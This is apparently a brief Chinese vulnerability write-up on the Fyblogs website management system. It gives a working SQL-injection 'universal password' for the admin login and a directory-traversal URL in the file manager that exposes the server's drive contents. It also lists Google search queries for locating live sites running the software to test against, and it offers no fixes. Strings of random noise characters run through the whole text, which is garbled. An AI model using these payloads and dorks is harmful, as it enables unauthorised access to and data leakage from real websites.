漏洞类型: 未授权访问/权限绕过
6 j9 k, j: N$ r% J! j# H( N6 v! L1 i( _/ f" b
简要描述:2 U4 K4 l8 S2 D. z1 j) M
- }4 ~$ C- s' S7 M* n1 w
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
K1 D0 l( O6 b8 A6 S
4 @* p, Y+ U* x+ ~/ f详细说明:! ]4 ?) Q0 e$ ^$ L
% U$ k ]4 j4 O% U' U& P. B后台万能密码 'or'='or'
; x- H2 Y1 G; ~后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!% e* z9 H* [ ^; ~& s3 o
admin/uploadfile.asp?currentFolder=/upfiles/../
$ p+ c. T( [# _) ^$ }; n7 P8 \( z( }6 B) Z9 u
漏洞证明:
5 }. U b, h" T, |* I& ]6 ]
3 t& m5 c$ d$ s3 ^* ]9 w# f, M谷歌:inurl:type.asp?id=1 新闻中心
$ h5 o+ W6 t+ W" l或者 :inurl:download_ok.asp?9 `$ r/ O6 L0 m" y) v; \0 S& W
! @/ R9 c2 Y0 M9 j! |. z可以测试: Z. ~- `0 A8 X7 W3 V2 D+ t. R
3 i2 a& A' ?. z# o2 {& P0 U" V1 I" o* I! ?( Z* H1 z: a
|